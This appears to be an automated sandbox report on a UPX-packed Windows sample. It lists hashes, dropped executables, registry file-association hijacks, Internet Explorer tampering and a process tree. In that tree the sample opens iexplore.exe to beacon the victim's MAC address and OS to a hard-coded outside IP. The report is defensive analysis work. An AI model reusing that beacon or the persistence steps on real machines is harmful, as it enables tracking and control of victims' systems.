e2cc76764a221ec6a0c9ab0092692cb2365a7717c7cb776385ad317d204c0a18

Analysis

max time kernel
75s
max time network
135s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
09-10-2024 04:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Size

40KB
MD5

2ad4f1632d532f4c977aff785ec53e0b
SHA1

5be9ec588720f9b67c8b25d8fa420a2efe15e04d
SHA256

e2cc76764a221ec6a0c9ab0092692cb2365a7717c7cb776385ad317d204c0a18
SHA512

26414f3e93c653d47a279bd671be091e8cf9e2db6fcb361679add215ea1d22ad94255a1a48ec2a2ec84f90a6fb925c563a40e0eaf3dafc9f984bf2a5e47b6ca2
SSDEEP

768:DYkPBF/KN4skG6q093w0nWeXAM6lH6qCnouzmpLZkPsC:D1JoCHRV6gqCnQLaN

Score

5^/10

discovery upx

Malware Config

Signatures

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1424-0-0x0000000000400000-0x0000000000423000-memory.dmp	upx
behavioral1/memory/1424-76-0x0000000000400000-0x0000000000423000-memory.dmp	upx

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\Thunder\9.exe	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
File opened for modification	C:\Program Files\Thunder\9.exe	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\WINDOWS\Downloaded Program Files\Update.exe	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

Modifies Internet Explorer settings 1 TTPs 38 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBar7Layout = 130000000000000000000000300000001400000016000000010000000007000080010000030000000103000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBarLayout = 110000005c00000000000000340000001f0000006e00000001000000a0060000a00f000005000000220400002600000002000000a1060000a00f000004000000a10000000f02000003000000a10200003b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007b88b8645d6de74ab21efaf0de98379b00000000020000000000106600000001000020000000cdefc0fdac5f02a838b4b2aa4baaa69a9902505dd84087be4c79d36f966ed8a0000000000e80000000020000200000005a983282ff99c78d34f06d64a3e3eddcef465bf0f3d303da76922a6813b153672000000060ee03346e9ff2e25705473f4f774d98e31b24561fc470f88c3a932f12e9c4d54000000073f16b0da6d0913e7bfc094b3bb8cf795d2177d3a91e383193e11e8c91567c5460cbd35ba182f11bd4d94893bee3b0e038209b04eecd8a2d2e25ec3b8d146d15	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e073c173521adb01	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{8553E521-8645-11EF-8595-E61828AB23DD} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007b88b8645d6de74ab21efaf0de98379b000000000200000000001066000000010000200000007474392459c111f8b0d8eb102a2b4acd5f1b753b1a4132509cb8ead0802f3664000000000e80000000020000200000002b421d7a8019fe6a2b99d9ce80087d6a5ee893dabdb477b71322294ccd500d2b90000000d0f30e49780a7506a5ac49792907fbc443ee33c155fdcf097c5b89b1a270125a0a55c513b9bbcc61407f997a674f059cd5776e3823d2ee947bc7a250933a6173a53d710810a17a77cc0b47566f25a9ca032a02f5b6bccce5839ea990f3c603966e8fbe14cd79d81a8d33dcbe21b8bfe468bffc101126ba451dd37a91f9f3c6574e7f9d5f1e80e2c7326c8ff0ef8416514000000083965a1f7ff03c883a201487949237a893ffa4090064e07fa5e119b725435972a51e6f7fac97adbadae33a97435939e83889806f712b1214f0ca4154087c5f23	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main\Frist	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "434643731"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe

Modifies registry class 40 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ura1\ = "ura1file"	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ura2file\shell\open\ = "open"	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ura2file\ = "path"	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\msm4file\ScriptEngine	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ura1file	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ura2file\shell\open\command	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\msm4file\DefaultIcon	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.msm4\ = "msm4file"	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\msm4file\shell\open\command\ = "C:\\Program Files\\Thunder\\9.exe \"%1\" %*"	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ura1file\DefaultIcon\ = "C:\\WINDOWS\\Downloaded Program Files\\taobao.ico"	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\msm4file\DefaultIcon\ = "C:\\Program Files\\Internet Explorer\\iexplore.exe,0"	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\msm4file\shell\open\ = "open"	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ura1file\shell	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ura1file\shell\open	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ura1file\shell\open\command	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ura1file\shell\open\ = "open"	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ura1file\ScriptEngine\ = "JScript.Encode"	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ura1file\DefaultIcon	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ura2	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ura2file\ScriptEngine	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.msm4	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\msm4file\shell\open\command	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ura1file\ = "path"	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ura1file\shell\open\command\ = "C:\\Program Files\\Thunder\\9.exe \"%1\" %*"	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ura2file\shell	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ura2file\DefaultIcon\ = "C:\\WINDOWS\\Downloaded Program Files\\game.ico"	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\msm4file	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\msm4file\shell\open	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\msm4file\ScriptEngine\ = "JScript.Encode"	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ura1file\ScriptEngine	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ura2file\DefaultIcon	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ura2file\shell\open	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\msm4file\ = "path"	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ura2file	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ura2\ = "ura2file"	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ura2file\shell\open\command\ = "C:\\Program Files\\Thunder\\9.exe \"%1\" %*"	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ura2file\ScriptEngine\ = "JScript.Encode"	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\msm4file\CLSID	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\msm4file\shell	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ura1	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2724	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2724	iexplore.exe
2724	iexplore.exe
2608	IEXPLORE.EXE
2608	IEXPLORE.EXE
2608	IEXPLORE.EXE
2608	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1424 wrote to memory of 2724	1424	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe	29
PID 1424 wrote to memory of 2724	1424	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe	29
PID 1424 wrote to memory of 2724	1424	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe	29
PID 1424 wrote to memory of 2724	1424	2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe	29
PID 2724 wrote to memory of 2608	2724	iexplore.exe	30
PID 2724 wrote to memory of 2608	2724	iexplore.exe	30
PID 2724 wrote to memory of 2608	2724	iexplore.exe	30
PID 2724 wrote to memory of 2608	2724	iexplore.exe	30

C:\Users\Admin\AppData\Local\Temp\2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118.exe"
1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1424
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Windows\system32\..\..\Program Files\Internet Explorer\iexplore.exe" http://58.218.198.119:8080/count.asp?mac=e6-18-28-ab-23-dd&os=Microsoft Windows XP&flag=1a0bb2ae2423107a04b780a595c803d8&user=2ad4f1632d532f4c977aff785ec53e0b_JaffaCakes118
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2724
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2724 CREDAT:275457 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:2608

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
84c768ad0fa3485b6210660b4d9fb6cd

SHA1
05bcc88db9533f534ac90a1ea4998a9c48871616

SHA256
945ee7679382744bc28661e8128b0aae8a0f8622b9446afee770e615d347d128

SHA512
f484545b461ad45cb0571e00a9ca86460586ceb694eae549044876a5a021da000f314c1e83c541117b83d56678604b0accf5eee6336ab52c1ef29f3107f86a4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
cf12b1604c9ade2221b7471158f1f94f

SHA1
f8dfc8adfc4cafe5a5db76346cc53d7caee4c518

SHA256
c05dce96c8abd27ae159e9cc4eac3194bb7957bfee5fc396ebf83aeee6cca899

SHA512
e3bc6b0f356a74cdffc3ea29f16af77d212e91d6a95f02546530f372f99f5066fd0902ec9567b46619f6b469c6177807062bc212f5cd3eda2f1cd4f71d77039d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
3ae7c28886c1d58bbacdccd3b20164e5

SHA1
6b6cce1a729396a78b3403e181b74c5c50a59ab2

SHA256
047a2ba96979df10e1e3b3712f85c3b9b110e0679238e489bb833bbb279ec02f

SHA512
64360182a37fd5354e97e9aec02d55b0c656a7e2bc1678dbc97fd9d5f5d01d3daa942b2842579c5a4545bdd76740f03cd1cbf2c3d8c883ad36d2cf3e98b7f037

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
3b5b694d2991b7723c90c5d117751e43

SHA1
907196dfc9a98026d4b18fec1e87f489be425fc5

SHA256
49dc68dbe740d280075efe9b63b79e2b30490a864b18b8b0d236e901cb0dc42c

SHA512
2ac52203a38f9fcddd500fce2a49f29ad031e2dbf10744fbea65dbee2cae536d5a22a619a4c4d4b8a1a73687747e9e3a720c30a7c3cced8be7afd82fc8a69cfd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
1f23aaf28d2e7695cef4088584d1ee84

SHA1
02b811b1e66216b61517dfb31db00efbdb04cdc1

SHA256
073cd78f81c939b62c89be9f5b89bb581623259862ac9be6dbf5cbc57dc56bce

SHA512
6ba97446dbba260597ffd43951a36b7129c73726f8b0043508c90d89200f31f43ca0a82dd6578dc55cf5ed12b089db37b0226b01d9b84545a6e258e360408abd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
3ab8437901ffd5d486408b19247571b9

SHA1
32a1b4dd093f671ced7620c8b148c1f4b4f72ea8

SHA256
64b9e51f54adc1bbad755fc68352cfe7a810daaacd173b4ee07d9860bda5c996

SHA512
ed08f47a597d73f81cfecc4d6fe8083cb1678a2306b0cbc79f4bf4b50cd71e37f1adec5ec9b6ea1a6438032ff28b4a09ac7b23eeebd2d074877ba0ad1343af18

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b077d16522399a715009927d2513f35f

SHA1
abeae43421928d7b1e36fe66d0cc77595d1b296f

SHA256
ed9b1b3478cfa366406d796af63d083e8c74d639297b29950d8a0ff2c1274246

SHA512
301992ee83cd66f3f093111aa540adc16752691ff447d3e075a8379718be135b5cca15dbb760e1b00de4adc42d1b06589d9956e72b6c9eacfbd4494fcd68bc4c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
4f7d1c6b4f518611ebee33231418f161

SHA1
d03c9db880a852bfab9944e6d35b8513b1ae73e4

SHA256
fbe2785b4d4a7658314dba250051049fcd5deacaabdce762a5757ef3b0d46341

SHA512
fe34a20ca7c1fb816156fb4f99876204d2866a6da0037717de63a056de52c78a1915f9d7a03b633aa5e4aee489d87421b4f8b14daed5d30b122c5c3ba7188020

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b652aa4fc82884fe670cab75af77c787

SHA1
ff457d9daf46880a624b142e36b389037f43a8d8

SHA256
529281134707c606f42e3e7db804dd6cdcac2c625420088704d4c901366f4655

SHA512
051dfe4a8a34e3c22734458a2e4a1db77357acd721d3d205bea8a08bb09603be4e9ae247b5ba751063508058553fea027a241142461b6d50f74ba0d943247d7a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
8483b6014e134ca5de5e3baea3c461f3

SHA1
3224243cdca000d154abc96300ee1d329a7dece6

SHA256
73fb4684baef7cf466510e47dfa48e73f748d958e1019cd2d29b258ed8a7b042

SHA512
e4a5d73ea4dcaf57f2a4cf1f59220bb799e0c045ee94bc5389d26367e9650e75bae3278e7b824c2d22aa67ca3797b02c99c118483f865263fc4138315547b573

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
aaaa5e944daa8c06a3455f016675b78c

SHA1
c8142592eb4471d37837a8ce96878e89d1a84887

SHA256
c6ce0dd38513116d410852b42d891435ea08ea41e4b1e41812f1e2dfaf269be7

SHA512
1aa3515cfa3777ec3500091e75efdd30d021fcb90e5b615d917db90abae8df0c45d8ab4bfb2a4c1aedc8b863f507344b0aa03bb29fe9f523cd05ee39112d7bb2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
44ecde058bee40718ac06fe4823508cb

SHA1
245bf90940ac2463c30a013d1b5e3daad05b46e6

SHA256
67acd70fcb0a6fdbdc6f5b3fb1c3179660fb054d176ff8f106aec8f006750bc1

SHA512
3ae939a09edab60c62e55d692d325ae361a41a41acb39f9a38b4d280da6b80f413e095c89a1e5e1936dba8036e3455e3f6e546e8eed5bd328d490e8127151726

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
6ee8f497b0e7fe3328f95d2ed7461039

SHA1
dcd02fcf8abe3846eaa079da1de1aafd585f17f4

SHA256
cffa5c369ee641f048f4cb54304a95045b185e38059381e3eb16182073e81fe8

SHA512
ff5dacbd9888be78a61a12364c362ae8e03a671771da8f7822f20edab6f2f1e44ff917e4e1a232241e1074e21c969ea354e47dc05495b192eb8a1530c0880e36

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
08b07ebfef6a8dd632e22b2f34534ef4

SHA1
8d89e0bcd52b88092f0ad0732b96b1af13000f33

SHA256
efad4749d65b1e644407caff517ac3d05056956af526bcbb545fe07b8da4740c

SHA512
01e9b41f92ae476b103435d6130c48d61a7f2e9558f486b2310d04cafd761d774947722956b3c216daf5f1df05861d085c010e9f81cd277ff6af6f6d6e76abdb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
9cf7cbde3cb1b76d4c8bbb72a8a04643

SHA1
15bc704821ba4c924b66c3e6339144b49013dac7

SHA256
bf3e0129aaaeb7b1e8f1ba51b53acc4c158a803f2044cb0efff78fea77c8073d

SHA512
cf195b82bdfbe2cac7faf893c0a64bfb57356f123aeb86494a3d4941f706d3da538b7837810e23451710de99ac781ba94d1023068b518f17806f4db0a312e7d3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
5f610132e7d122c621d679643b72d5b8

SHA1
c03bc19f8177872884d874a060f6fc02150a8395

SHA256
badcf3830e54550db618604003b0cd938cec1ae37f16129b6f8d1a08b35f66fc

SHA512
d89747d76896ad34671a842046574a4f3a0bc8d688d3228d9d14e4ee69a6c47078e661dd4fd890aa537f5a5e5671b15a08866fc4a8e21474212261e1e53bfc9e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

